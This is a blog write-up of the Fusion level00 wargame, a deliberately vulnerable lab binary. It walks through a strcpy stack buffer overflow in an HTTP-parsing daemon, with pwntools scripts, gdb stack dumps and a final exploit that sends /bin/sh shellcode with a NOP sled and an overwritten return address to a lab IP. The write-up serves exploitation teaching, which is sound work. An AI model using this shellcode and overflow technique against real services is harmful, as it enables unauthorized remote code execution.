Binary Exploitation Series Part 1

Fusion level00 write-up

Hi all I decided to come back with a series of random binary exploitation I’ll solve exercises from different websites CTF, vuln machine etc .. ,The point is that I’ll not stick to one site so we can learn different techniques and methods of Binary exploitation.

That’s being said let’s start by analyzing the C source code.

#include “../common/common.c”   

int fix_path(char *path)
{
  char resolved[128];
 
  if(realpath(path, resolved) == NULL) return 1;
  // can’t access path. will error trying to open

  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf(“[debug] buffer is at 0x%08x :-)\n”, buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0)
    errx(0, “Failed to read from remote host”);
  if(memcmp(buffer, “GET “, 4) != 0) errx(0, “Not a GET request”);

  path = &buffer[4];
  q = strchr(path, ‘ ‘);
  if(! q) errx(0, “No protocol version specified”);
  *q++ = 0;
  if(strncmp(q, “HTTP/1.1”, 8) != 0) errx(0, “Invalid protocol”);

  fix_path(path);

  printf(“trying to access %s\n”, path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT);
  set_io(fd);

  parse_http_request();
}

So the first thing we note here is that the main method starts a deamon process which is a background process, then we can see parse_http_request() what basically this function will do is that it’ll check if the request is valid or not what I mean by that is every request has to include this String GET[space]path[space]HTTP/1.1 from the source code you can see that the path variable is pointing to  path = &buffer[4]; value to buffer’s address+4. If our request is valid we will go to fix_path(char *path) function obviously it’s clear now what we have to exploit the strcpy() function.I hope everything is clear now go and give it a try.!

Exploiting time, first of all this should be a remote exploit because the binary is listing on some PORT we can easily get the PORT by issuing this command.

fusion@fusion:/opt/fusion/bin$ ps aux | grep level00
20000     1250  0.0  0.0   1816   256 ?        Ss   Jan21   0:00 /opt/fusion/bin/level00
fusion    2877  0.0  0.0   4184   796 pts/0    S+   00:58   0:00 grep –color=auto level00

Now we know on what PORT this binary is listing so the next port is to create a python script to determine the offset to overwrite the return address.

from pwn import *
r = remote(“10.0.2.25”,20000)
print(r.recvuntil(‘)\n’))
r.sendline(b”GET ” + b”A”*139 + b” HTTP/1.1″)
r.interactive() 

 After some trials and guessing we got the offset to return address 139

You must attach the process to the gdb by first issuing these commands

sudo gdb

gdb-peda$ attach <PID-OF-LEVEL00>

Then continue the execution and run the python script 

gdb-peda$ c
[New process 3710]

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 3710]
‘Undefined command: c\x00\x00\x00o\x00\x00\x00n\x00\x00\x00t\x00\x00\x00e\x00\x00\x00x\x00\x00\x00t\x00\x00\x00. Try “peda help”‘
‘Undefined command: s\x00\x00\x00e\x00\x00\x00s\x00\x00\x00s\x00\x00\x00i\x00\x00\x00o\x00\x00\x00n\x00\x00\x00. Try “peda help”‘
0x41414141 in ?? ()

So far so good we just have to craft our exploit properly let’s first check the security mitigation of this binary.

root@kali:~/fusion# checksec level00
[*] ‘/root/fusion/level00’
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

So there’s no any security mitigations for this binary let’s now craft out exploit 

from pwn import *
shellcode = b”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80″ #online shell code
back = p32(0xbffff98c) # the address to our shellcode
payload = b””
payload += b”A”*139 # the offset to reach eip is 139
payload += back
payload += b”\x90″*4
payload += shellcode

r = remote(“10.0.2.25”,20000)
print(r.recvuntil(‘)\n’))
r.sendline(b”GET ” + payload + b” HTTP/1.1″)
r.interactive()

We got the return address by analyzing the stack if we modify this

from pwn import *
r = remote(“10.0.2.25”,20000)
print(r.recvuntil(‘)\n’))
r.sendline(b”GET ” + b”A”*139 + b“B” + b” HTTP/1.1″)
r.interactive()     

gdb-peda$ c
[New process 4111]

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 4111]
‘Undefined command: c\x00\x00\x00o\x00\x00\x00n\x00\x00\x00t\x00\x00\x00e\x00\x00\x00x\x00\x00\x00t\x00\x00\x00. Try “peda help”‘
‘Undefined command: s\x00\x00\x00e\x00\x00\x00s\x00\x00\x00s\x00\x00\x00i\x00\x00\x00o\x00\x00\x00n\x00\x00\x00. Try “peda help”‘
0x42424242 in ?? ()
gdb-peda$ x/50wx $esp
0xbfa0a190:    0xbfa0a100    0x00000020    0x00000004    0x001761e4
0xbfa0a1a0:    0x001761e4    0x000027d8    0x20544547    0x41414141
0xbfa0a1b0:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a1c0:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a1d0:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a1e0:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a1f0:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a200:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a210:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a220:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfa0a230:    0x41414141    0x42414141    0x00424242    0x50545448
0xbfa0a240:    0x312e312f    0xb7856b0a    0xb7856858    0x080485f5
0xbfa0a250:    0xb76dbff0    0x0804846c

We can observe that the “BBBB” is on 0xbfa0a237 so if we will put 4 bytes NOP sled and then our shell code and get the address of the Nope sled on the stack so get any address after 0xbfa0a237 and put it as return address so it’ll jump to your Nope sled and then execute your shellcode. Please not that the addresses may varies between your execution and mine just follow the steps and you’ll be fine.

If you have any questions please contact me on omaroobaniessa@gmail.com

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s